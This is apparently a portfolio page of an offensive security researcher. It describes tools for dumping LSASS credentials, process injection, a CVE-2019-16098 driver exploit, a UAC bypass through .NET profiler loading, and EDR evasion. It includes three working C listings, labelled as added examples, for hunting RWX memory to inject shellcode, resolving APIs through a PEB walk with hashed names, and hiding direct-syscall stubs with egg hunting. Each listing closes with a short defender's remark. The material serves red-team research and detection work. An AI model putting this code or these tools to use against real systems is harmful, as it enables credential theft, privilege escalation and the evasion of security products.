Welcome to my portfolio, a hub for my cybersecurity series, blogs, and projects, organized for your insight.



Usman Sikander (a.k.a Offensive-Panda)

Offensive Security Researcher @ Cytomate

Explore My Articles

Cybersecurity series

Defense Evasion Series

Malware Analysis Series

Process Injection Series

Series (GitHub Pages) and what each covers:

Advanced Evasion Techniques: a repository for cybersecurity enthusiasts, researchers, and professionals who want to sharpen their skills in malware development, offensive security, and the defenses built against both.
Malware Analysis: a central repository of resources for professionals and researchers who analyze different families and types of malware, intended to build up practical malware research skills.
Process Injection Techniques: a series that walks through the process injection techniques used by adversaries, one technique at a time, for readers building expertise in offensive security.

Pinned projects

RWX MEMORY HUNT AND INJECTION DV
Abuses the Windows process fork API together with a running OneDrive.exe process to inject shellcode without allocating a new RWX memory region. The technique hunts for an RWX region that an already running process (OneDrive.exe in this case) has already committed, writes the shellcode into that region, and executes it, so VirtualAlloc, VirtualAllocEx and VirtualProtect are never called.
🔴 C++
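The hunt step, as an added example that is not code from this repository: a C program that picks, from a process's memory map, a committed PAGE_EXECUTE_READWRITE region large enough for the payload, which is the precondition for writing shellcode without any VirtualAlloc/VirtualProtect call. The region list, its addresses and the 0x1000-byte payload size are constructed for illustration; the part that enumerates a live process with VirtualQueryEx is compiled only under _WIN32. The fork step and the actual write and execute are not shown.

```c
/* Added example, not code from the RWX-MEMORY-HUNT-AND-INJECTION-DV repo: the
 * "hunt" half of the technique.  Instead of allocating or re-protecting memory,
 * the injector looks for a region the target already committed as
 * PAGE_EXECUTE_READWRITE and large enough for the payload.  The selection logic
 * is portable and runs here on a constructed region list; the VirtualQueryEx
 * walk that supplies real regions is compiled on Windows only. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* MEMORY_BASIC_INFORMATION constants, values as in <winnt.h>. */
#define MBI_MEM_COMMIT             0x1000u
#define MBI_MEM_RESERVE            0x2000u
#define MBI_MEM_PRIVATE            0x20000u
#define MBI_PAGE_READWRITE         0x04u
#define MBI_PAGE_EXECUTE_READWRITE 0x40u
#define MBI_PAGE_GUARD             0x100u

typedef struct {
    uint64_t base;    /* BaseAddress */
    uint64_t size;    /* RegionSize */
    uint32_t state;   /* State: MEM_COMMIT / MEM_RESERVE / MEM_FREE */
    uint32_t protect; /* Protect: current protection (not AllocationProtect) */
    uint32_t type;    /* Type: MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE */
} region_t;

/* Pick the first region that is committed, currently *exactly* RWX (a guard bit
 * would fault on the first write) and at least `need` bytes.  Returns 1 and the
 * base on success, 0 if nothing qualifies. */
int find_rwx_region(const region_t *r, size_t n, uint64_t need, uint64_t *base_out)
{
    for (size_t i = 0; i < n; i++) {
        if (r[i].state != MBI_MEM_COMMIT) continue;
        if (r[i].protect != MBI_PAGE_EXECUTE_READWRITE) continue;
        if (r[i].size < need) continue;
        *base_out = r[i].base;
        return 1;
    }
    return 0;
}

/* Constructed sample of what a VirtualQueryEx walk might return. */
static const region_t sample_regions[] = {
    { 0x10000, 0x1000,  MBI_MEM_COMMIT,  MBI_PAGE_READWRITE,                          MBI_MEM_PRIVATE }, /* RW heap */
    { 0x20000, 0x1000,  MBI_MEM_COMMIT,  MBI_PAGE_EXECUTE_READWRITE | MBI_PAGE_GUARD, MBI_MEM_PRIVATE }, /* guard page */
    { 0x30000, 0x800,   MBI_MEM_COMMIT,  MBI_PAGE_EXECUTE_READWRITE,                  MBI_MEM_PRIVATE }, /* small RWX */
    { 0x40000, 0x10000, MBI_MEM_RESERVE, 0,                                           MBI_MEM_PRIVATE }, /* reserved only */
    { 0x50000, 0x4000,  MBI_MEM_COMMIT,  MBI_PAGE_EXECUTE_READWRITE,                  MBI_MEM_PRIVATE }, /* large RWX */
};
#define SAMPLE_COUNT (sizeof sample_regions / sizeof sample_regions[0])

/* Hunt in the constructed sample for a payload of `payload_size` bytes; returns base or 0. */
uint64_t hunt_sample(uint64_t payload_size)
{
    uint64_t base = 0;
    return find_rwx_region(sample_regions, SAMPLE_COUNT, payload_size, &base) ? base : 0;
}

#ifdef _WIN32
#include <windows.h>
/* Enumerate a live process's regions with VirtualQueryEx (handle needs
 * PROCESS_QUERY_INFORMATION); stops at `max` entries or end of address space. */
size_t collect_regions(HANDLE proc, region_t *out, size_t max)
{
    MEMORY_BASIC_INFORMATION mbi;
    uint8_t *addr = NULL;
    size_t n = 0;
    while (n < max && VirtualQueryEx(proc, addr, &mbi, sizeof mbi) == sizeof mbi) {
        out[n].base = (uint64_t)(uintptr_t)mbi.BaseAddress;
        out[n].size = mbi.RegionSize;
        out[n].state = mbi.State;
        out[n].protect = mbi.Protect;
        out[n].type = mbi.Type;
        n++;
        addr = (uint8_t *)mbi.BaseAddress + mbi.RegionSize;  /* next region */
    }
    return n;
}
#endif

int main(int argc, char **argv)
{
    uint64_t base = 0;
#ifdef _WIN32
    if (argc > 1) {  /* usage: rwxhunt <pid> */
        static region_t live[4096];
        HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, (DWORD)atoi(argv[1]));
        if (!h) { fprintf(stderr, "OpenProcess failed: %lu\n", GetLastError()); return 1; }
        size_t n = collect_regions(h, live, sizeof live / sizeof live[0]);
        CloseHandle(h);
        if (find_rwx_region(live, n, 0x1000, &base)) printf("RWX region at 0x%llx\n", (unsigned long long)base);
        else puts("no committed RWX region found");
        return 0;
    }
#endif
    (void)argc; (void)argv;
    if (find_rwx_region(sample_regions, SAMPLE_COUNT, 0x1000, &base))
        printf("sample: RWX region at 0x%llx\n", (unsigned long long)base);
    return 0;
}
```

Run without arguments it reports the 0x50000 region from the constructed sample (0x30000 is RWX but too small for 0x1000 bytes, 0x20000 carries PAGE_GUARD, 0x40000 is only reserved). The same scan, read from the defender's side, is the basic hunt for suspicious RWX memory: a committed private RWX region in a process that has no JIT of its own is worth a closer look.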
Shadow Dumper Tool
Shadow Dumper is a tool for dumping LSASS (Local Security Authority Subsystem Service) memory, a step often needed in penetration testing and red teaming. It offers flexible options and uses multiple techniques to dump the process memory, giving access to the credential material that LSASS holds in memory.
🔴 C++ 🟢 C 🟡 Assembly
Lsass Memory Dumping (D3MPSEC)
D3MPSEC is a memory dumping tool that extracts a memory dump of the LSASS process using several techniques, including direct system calls, randomized procedures, and obfuscated function prototype names. Its primary purpose is to bypass the static and dynamic analysis commonly performed by security products.
🔴 C++ 🟢 C 🟡 Assembly
Lsass Reflect Dumping
This tool uses process forking through the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone exists, it uses MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the clone rather than of lsass.exe itself. Mimikatz and pypykatz can then parse the dump offline to extract the hashes.
🔴 C++
Defense Evasion Techniques
A central repository of defense evasion techniques for cybersecurity enthusiasts, researchers, and professionals who want to improve their skills in malware development, offensive security, and the defenses built against both.
🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch 🟠 C#
Process Injection Techniques
A central repository of the process injection techniques used by adversaries, each explored in depth, for cybersecurity enthusiasts, researchers, and professionals working in offensive security.
🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch
NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE
This project rebuilds and exploits CVE-2019-16098 in the Micro-Star MSI Afterburner 4.6.2.15658 driver (RTCore64.sys and RTCore32.sys), which allows any authenticated user to read and write arbitrary memory, I/O ports, and MSRs. Instead of a hardcoded base address for ntoskrnl.exe, I calculate it dynamically, and I recalculated all offsets for the newer version of Windows.
🔴 C++
WPM-MAJIC-ENTRY-POINT-INJECTION
This exploit targets the process's AddressOfEntryPoint, which is mapped RX, and relies on the internal behaviour of WriteProcessMemory to change the page protection and write the shellcode there. It also uses direct syscalls to bypass the user-mode hooks placed by AV/EDR products. The technique never calls VirtualAlloc or VirtualProtect directly in the code; the protection change that VirtualProtect would normally perform is done by WriteProcessMemory internally.
🔴 C++ 🟢 C 🟡 Assembly
.NET_PROFILER_DLL_LOADING
.NET profiler DLL loading can be abused to make a legitimate .NET application load an attacker-controlled DLL through environment variables (COR_ENABLE_PROFILING, COR_PROFILER and COR_PROFILER_PATH). This exploit uses that behaviour against Task Scheduler (MMC) to bypass UAC and obtain administrative privileges.
🔴 C++ 🟢 C
PEB_WALK_AND_API_OBFUSCATION_INJECTION
This exploit uses the PEB walk technique to resolve API addresses dynamically and obfuscates all API calls before performing process injection, so no import entries or API-name strings are left for a scanner to match. These techniques help bypass the static analysis performed by AV/EDR solutions.
🔴 C++
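API hashing as an added example, not this repository's code: only the 32-bit hash of an export name is embedded in the binary, and the module's export names are hashed and compared one by one at run time. The portable part runs against a constructed export table with dummy addresses; under _WIN32 the same comparison is fed from PEB->Ldr->InMemoryOrderModuleList and the module's IMAGE_EXPORT_DIRECTORY, so neither GetModuleHandle/GetProcAddress nor any API-name string appears. The names ror13_hash, resolve_by_hash and peb_resolve are chosen here, not taken from the project.

```c
/* Added example, not code from the PEB_WALK_AND_API_OBFUSCATION_INJECTION repo:
 * resolve APIs by hash so no API-name string is left in the binary.  The hash
 * and resolver are portable (exercised on a constructed export table); the
 * Windows-only path feeds them real names from PEB->Ldr and the PE export table. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* ROR13 string hash (the one used by Metasploit's block_api shellcode). */
uint32_t ror13_hash(const char *s)
{
    uint32_t h = 0;
    for (; *s; s++)
        h = ((h >> 13) | (h << 19)) + (uint8_t)*s;
    return h;
}

typedef struct { const char *name; void *addr; } export_entry_t;

/* `want` is ror13_hash("SomeApi") precomputed at build time; only hashes are compared. */
void *resolve_by_hash(const export_entry_t *tab, size_t n, uint32_t want)
{
    for (size_t i = 0; i < n; i++)
        if (ror13_hash(tab[i].name) == want) return tab[i].addr;
    return NULL;
}

/* Constructed stand-in for kernel32's export name table; addresses are dummies. */
static const export_entry_t sample_exports[] = {
    { "CloseHandle",        (void *)0x1000 },
    { "OpenProcess",        (void *)0x2000 },
    { "VirtualAllocEx",     (void *)0x3000 },
    { "WriteProcessMemory", (void *)0x4000 },
};
void *resolve_sample(uint32_t want)
{
    return resolve_by_hash(sample_exports, sizeof sample_exports / sizeof sample_exports[0], want);
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
#include <intrin.h>
/* Locate a module by the hash of its lower-cased file name (e.g. "kernel32.dll")
 * and an export by the hash of its name, via PEB->Ldr->InMemoryOrderModuleList
 * and IMAGE_EXPORT_DIRECTORY: no GetModuleHandle/GetProcAddress, no name strings.
 * Forwarded exports are not followed. */
void *peb_resolve(uint32_t module_hash, uint32_t func_hash)
{
#ifdef _WIN64
    PEB *peb = (PEB *)__readgsqword(0x60);
#else
    PEB *peb = (PEB *)__readfsdword(0x30);
#endif
    LIST_ENTRY *head = &peb->Ldr->InMemoryOrderModuleList;
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
        LDR_DATA_TABLE_ENTRY *m = CONTAINING_RECORD(e, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (!m->DllBase || !m->FullDllName.Buffer) continue;
        /* winternl.h only exposes FullDllName (a path): hash its lower-cased file name. */
        char name[64]; size_t n = 0, len = m->FullDllName.Length / sizeof(WCHAR), start = 0;
        for (size_t i = 0; i < len; i++) if (m->FullDllName.Buffer[i] == L'\\') start = i + 1;
        for (size_t i = start; i < len && n < sizeof name - 1; i++) {
            WCHAR c = m->FullDllName.Buffer[i];
            name[n++] = (char)((c >= L'A' && c <= L'Z') ? c + 32 : c);
        }
        name[n] = 0;
        if (ror13_hash(name) != module_hash) continue;

        uint8_t *base = (uint8_t *)m->DllBase;
        IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
        DWORD rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!rva) return NULL;
        IMAGE_EXPORT_DIRECTORY *ed = (IMAGE_EXPORT_DIRECTORY *)(base + rva);
        DWORD *names = (DWORD *)(base + ed->AddressOfNames);
        WORD  *ords  = (WORD  *)(base + ed->AddressOfNameOrdinals);
        DWORD *funcs = (DWORD *)(base + ed->AddressOfFunctions);
        for (DWORD i = 0; i < ed->NumberOfNames; i++)
            if (ror13_hash((const char *)(base + names[i])) == func_hash)
                return base + funcs[ords[i]];
        return NULL;
    }
    return NULL;
}
#endif

int main(void)
{
    uint32_t h = ror13_hash("WriteProcessMemory");   /* a literal constant in a real build */
    printf("hash=0x%08x sample addr=%p\n", h, resolve_sample(h));
#ifdef _WIN32
    printf("PEB walk: %p, GetProcAddress: %p\n", peb_resolve(ror13_hash("kernel32.dll"), h),
           (void *)GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
#endif
    return 0;
}
```

On Windows the two pointers printed by main should match, which is the quick check that the export-table walk is right. Two caveats a practitioner should keep in mind: ROR13 hash constants are themselves a signature (the FLARE shellcode-hash database maps well-known values straight back to API names, so a custom hash or a per-build seed is common), and the resolver above does not handle forwarded exports, so a hash that lands on a forwarder returns a pointer into the export directory rather than code.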
Dirty Vanity New (DV_NEW)
This is a combination of multiple evasion techniques. It uses direct syscalls to bypass user-mode EDR hooking, and to avoid static detection of the syscall instruction in the stub I am using an egg hunt technique.
🔴 C++ 🟢 C 🟡 Assembly
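The egg hunt applied to a direct-syscall stub, as an added example that is not code from DV_NEW: the stub is built without the `syscall ; ret` bytes (0F 05 C3) and carries an 8-byte placeholder in their place, so a static scan for the syscall opcode finds nothing; at run time a loader routine searches the stub for that egg and patches the real bytes in. The stub bytes, the egg value and the system call number 0x18 are constructed for illustration. On Windows the stub sits in an executable section, so it has to be made writable (VirtualProtect) before patching and restored afterwards; that step is left out here so the block runs anywhere.

```c
/* Added example, not code from the DV_NEW repository: egg hunting for a
 * direct-syscall stub.  The binary ships the stub with a placeholder ("egg")
 * where `syscall ; ret` belongs; the loader hunts for the egg at run time and
 * patches in the real opcodes.  Stub bytes and SSN are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* 8-byte egg: long enough not to occur by accident elsewhere in the image. */
static const uint8_t EGG[8]   = { 0xDE, 0xAD, 0xBE, 0xEF, 0xDE, 0xAD, 0xBE, 0xEF };
/* Replacement of the same length: syscall ; ret ; nop x5 (no relocation needed). */
static const uint8_t PATCH[8] = { 0x0F, 0x05, 0xC3, 0x90, 0x90, 0x90, 0x90, 0x90 };

/* Constructed x64 stub as it would sit in the binary:
 *   4C 8B D1          mov r10, rcx
 *   B8 18 00 00 00    mov eax, 0x18      (hypothetical SSN)
 *   <egg>             placeholder for syscall ; ret */
uint8_t stub[] = {
    0x4C, 0x8B, 0xD1,
    0xB8, 0x18, 0x00, 0x00, 0x00,
    0xDE, 0xAD, 0xBE, 0xEF, 0xDE, 0xAD, 0xBE, 0xEF,
};

/* What a naive static scanner looks for: a literal `syscall` (0F 05) opcode. */
int contains_syscall_opcode(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (buf[i] == 0x0F && buf[i + 1] == 0x05) return 1;
    return 0;
}

/* Egg hunt: replace every occurrence of EGG in buf with PATCH and return the
 * number of sites patched.  The buffer must already be writable. */
size_t egg_hunt_patch(uint8_t *buf, size_t len)
{
    size_t hits = 0;
    for (size_t i = 0; i + sizeof EGG <= len; ) {
        if (memcmp(buf + i, EGG, sizeof EGG) == 0) {
            memcpy(buf + i, PATCH, sizeof PATCH);
            hits++;
            i += sizeof EGG;
        } else {
            i++;
        }
    }
    return hits;
}

/* Run the hunt on a copy of the constructed stub.  Reports whether the syscall
 * opcode is visible before and after, how many eggs were hit, and returns 1 if
 * syscall;ret now sits exactly where the egg was. */
int demo_egg_hunt(int *before, int *after, size_t *hits)
{
    uint8_t copy[sizeof stub];
    memcpy(copy, stub, sizeof stub);
    *before = contains_syscall_opcode(copy, sizeof copy);
    *hits = egg_hunt_patch(copy, sizeof copy);
    *after = contains_syscall_opcode(copy, sizeof copy);
    return memcmp(copy + 8, PATCH, sizeof PATCH) == 0;
}

int main(void)
{
    int before, after; size_t hits;
    int ok = demo_egg_hunt(&before, &after, &hits);
    printf("syscall opcode visible before=%d after=%d, eggs patched=%zu, placed correctly=%d\n",
           before, after, hits, ok);
    return 0;
}
```

The before/after pair is the whole point: the on-disk image scans clean, the in-memory image does not. That asymmetry is also the detection angle, since a memory scan of the running process (or a hook on NtProtectVirtualMemory flipping a code page writable just before a syscall) sees exactly what the static scanner missed.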
Malware Analysis
A central repository for cybersecurity enthusiasts, researchers, and professionals who want to advance their skills in analyzing and understanding different types of malware.
🔴 C++ 🟢 C 🟡 Assembly 🟣 Batch 🟠 C#


Connect with me

Twitter, LinkedIn, Medium, GitHub


Languages and tools

C C++ C# CSS3 HTML5 Python